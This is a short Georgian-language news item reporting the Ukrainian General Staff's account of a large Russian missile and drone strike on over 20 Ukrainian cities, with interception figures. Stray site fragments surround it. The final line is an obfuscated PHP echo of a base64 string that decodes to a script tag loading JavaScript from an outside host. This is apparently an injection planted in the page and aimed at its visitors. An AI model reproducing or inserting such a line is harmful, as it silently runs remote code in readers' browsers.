celsiusi
ავერსი საქკაბელი
რუსეთის ძალებმა ბოლო ერთ დღე-ღამეში მასირებული სარაკეტო იერიში მიიტანეს უკრაინის 20-ზე მეტი დასახლებული პუნქტის ინფრასტრუქტურასა და მშვიდობიან მოქალაქეებზე. ოკუპანტებმა 84-ზე მეტი სარაკეტო და საავიაციო დარტყმა განახორციელეს, უკრაინის თავდაცვის სისტემამ 56 საჰაერო სამიზნე გაანადგურა.
 
შესაბამის ინფორმაციას უკრაინის შეიარაღებული ძალების გენშტაბი ავრცელებს.
 
„ბრძოლის ველზე მიღწევების არქონის ფონზე, რუსეთის საოკუპაციო არმია მიმართავს უკრაინის სამოქალაქო მოსახლეობის წინააღმდეგ ტერორის ტაქტიკას. საერთაშორისო ჰუმანიტარული სამართლის ნორმების, ომის წარმოების კანონებისა და წესების დარღვევით, ის დარტყმებს აყენებს კრიტიკულ ინფრასტრუქტურას და ასევე საცხოვრებელ სახლებს“, – ნათქვამია გენშტაბის განცხადებაში.
 
კერძოდ, უკრაინის შეიარაღებული ძალების ცნობით, ბოლო ერთი დღის განმავლობაში დაიბომბა ისეთი ქალაქები, როგორიცაა კიევი, ლვოვი, როვნო, ჟიტომირი, ტერნოპოლი, ხმელნიცკი, ივანო-ფრანკოვსკი, ვინიცა, პრილუკი, ნეჟინი, კონოტოპი, ხარკოვი, კრემენჩუგი, დნეპრი, კრივი-რიჰი, ზაპოროჟიე, მიკოლევი, ოდესა. არის მსხვერპლი მშვიდობიან მოსახლეობაში.
 
ოკუპანტებმა გამოიყენეს ფრთოსანი, ბალისტიკური რაკეტები, ასევე უპილოტო საფრენი აპარატები. უკრაინის ძალებმა 43 ფრთოსანი რაკეტისა და 13 უპილოტო აპარატის განადგურება შეძლეს.
 
გენშტაბი მოსახლეობას აფრთხილებს, რომ მოწინააღმდეგის მხრიდან საავიაციო და სარაკეტო დარტყმების განხორციელების საფრთხე უკრაინის მთელ ტერიტორიაზე შენარჩუნებულია.
415
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");